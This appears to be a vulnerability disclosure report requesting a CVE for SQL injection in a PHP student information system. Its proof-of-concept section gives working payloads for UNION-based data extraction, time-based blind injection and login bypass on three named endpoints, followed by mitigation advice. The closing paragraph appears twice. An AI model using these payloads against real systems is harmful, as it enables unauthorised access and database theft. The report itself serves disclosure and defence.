## https://sploitus.com/exploit?id=426AA145-8BC0-5676-8C8D-A90CBAFFCAB0
# CRITICAL-SEVERITY-VULNERABILITY-REPORT-Widespread-SQLI
CRITICAL SEVERITY VULNERABILITY REPORT: Widespread SQL Injection
**Report Date:** November 5, 2025
**Researcher:** i4g5d
**Contact:** yjh201004030080@qq.com
## I. Vulnerability Summary
A series of **SQL Injection** vulnerabilities were discovered across multiple functional modules in the **Student Information System** by Fabian Ros (version **[November 2, 2025(2)]**).
The fundamental cause of these vulnerabilities is a **widespread lack of proper input sanitization and failure to use parameterized queries** when processing user input before inserting it into SQL statements.
- **Impact 1 (Authentication Bypass):** Attackers can bypass normal login mechanisms using "Magic Quotes" or other logic-changing payloads.
- **Impact 2 (Data Exfiltration - High Risk):** In modules with output display, attackers can use **UNION SELECT** to extract arbitrary sensitive information from the entire database.
- **Impact 3 (Blind Injection):** In non-display modules, attackers can use **Time-Based Blind SQLi** to infer and extract sensitive database contents.
**Severity: Critical**
## II. Affected Product and Version
| **Field** | **Detail** |
| -------------------- | ---------------------------------------- |
| **Product Name** | Student Information System |
| **Project Author** | Fabian Ros |
| **Affected Version** | November 2, 2025(2) (and prior versions) |
## III. Technical Details
### 1. Vulnerability Type
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
### 2. Vulnerability Description
The application exhibits a **consistent pattern of insecure coding practices** across various scripts. Three distinct injection points were identified, demonstrating different levels of exploitability:
| No. | Vulnerability Location / Endpoint | Injection Type | Primary Exploitation Capability |
| -------------------- | -------------------------------------------- | ----------------------------- | ------------------------------------ |
| **#1 (Primary PoC)** | `/searchresults.php` (`searchbox` parameter) | **UNION-based SQLi** | Data Exfiltration (Highest Severity) |
| **#2** | `/register.php` (`username` parameter) | **Time-Based Blind SQLi** | Data Extraction, Time Delay attacks |
| **#3** | `/index.php` (Login: `username` parameter) | **Boolean Blind/Auth Bypass** | Data Inference |
## IV. Proof of Concept (PoC)
### A. UNION-based SQL Injection PoC (`/searchresults.php` - `searchbox`)
This PoC demonstrates the ability to execute arbitrary database queries and exfiltrate data.
1. **Logic Bypass Test:** Input the following payload into the search bar (corresponding to the `searchbox` parameter):
```
a' and 1=1#
```

**Result:** The page returned all user information, confirming that the original SQL logic was successfully bypassed. The query was likely evaluated as `WHERE name = 'a' AND 1=1`.
2. **Data Exfiltration Test (UNION SELECT):**
- **Determine Column Count:** Confirmed 7 columns using `a' order by 7#` (Success) vs. `a' order by 8#` (Error).
- **Find Echo Point:** Input `a' UNION SELECT NULL,1,NULL,NULL,NULL,NULL,NULL#`, and the number `1` was successfully displayed in the 2nd field.

- **Extract Database Info:** Input `a' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL#`.
**Final Result:** Database information was successfully extracted, confirming the vulnerability's high severity and data exfiltration capability.


### B. Blind/Authentication Bypass PoC (#2 and #3)
#### 1. Injection Point #2 (Time-Based Blind SQLi in `/register.php` - `username` parameter)
This demonstrates the use of time-delay payloads in a non-displaying endpoint.
Input the following payload into the registration username field:
```
a' and sleep(3)#
```

**Result:** The application successfully performed a time delay of approximately 3 seconds before responding. This confirms the SQL injection point and its potential for automated Time-Based Blind SQL injection to extract data.
#### 2. Injection Point #3 (Authentication Bypass and Time-Based Blind SQLi in `/index.php` - `username` parameter)
This demonstrates the ability to bypass authentication for any known user.
Input the following payload into the login username field (assuming user 'yjh' is known):
```
username=yjh' and 1=1#
or
password=a' or 1=1#
```
**Result:** The attacker can successfully log in as user 'yjh' without needing the correct password. This confirms the vulnerability's authentication bypass capability.
After testing, blind SQL injection (time-based blind injection, Boolean blind injection) can also be used to obtain detailed data down to the database fields.
```
yjh' and sleep(5)#
yjh' and if((select count(schema_name) from information_schema.schemata)=2,sleep(5),1)#
```

## V. Suggested Mitigation
To comprehensively eliminate this widespread SQL Injection pattern, the vendor **must** implement the following core mitigation measures across **all** database interaction points:
### 1. Implement Parameterized Queries (Core Fix)
**The most critical fix:** Never concatenate user input directly into SQL query strings. Use **Prepared Statements** (Parameterized Queries) via modern APIs (e.g., PHP's PDO or MySQLi with prepared statements). This ensures user input is always treated as **data**, not as **executable SQL commands**.
### 2. Strict Input Validation
Implement strict whitelist validation for all input parameters. For example, if a search field is only expected to contain alphanumeric characters, any input containing SQL-specific characters (like `'`, `#`, or `--`) should be rejected.
### 3. Principle of Least Privilege (PoLP)
Configure the database user account used by the web application to adhere to the Principle of Least Privilege, restricting its access to only the necessary tables and databases.
I look forward to your reply and cooperation. We hope to obtain the CVE number as soon as possible. Thank you for your hard work.
Configure the database user account used by the web application to adhere to the Principle of Least Privilege, restricting its access to only the necessary tables and databases.
I look forward to your reply and cooperation. We hope to obtain the CVE number as soon as possible. Thank you for your hard work.